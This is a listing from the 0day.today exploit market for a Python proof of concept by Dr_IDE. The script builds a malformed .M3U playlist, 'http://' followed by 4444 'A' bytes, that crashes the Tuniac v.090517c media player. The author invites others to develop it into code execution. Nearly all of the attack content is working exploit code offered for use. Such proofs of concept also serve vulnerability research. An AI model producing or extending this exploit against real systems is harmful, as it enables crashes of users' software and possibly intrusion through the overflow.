[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Tuniac v.090517c (.M3U File) Local File Crash PoC

Author
Dr_IDE
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8046
Category
local exploits
Date add
04-08-2009
Platform
unsorted
=================================================
Tuniac v.090517c (.M3U File) Local File Crash PoC
=================================================


#!/usr/bin/env python

##############################################################################################
#
# Tuniac v.090517c (.M3U) Crash PoC
# Found By: Dr_IDE
# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
#
##############################################################################################

# Play around here, anything seems to knock it out.
buffer = ("http://" + "\x41" * (4444));

f = open('Dr_IDE.M3U','w');
f.write(buffer);
f.close();



#  0day.today [2024-09-29]  #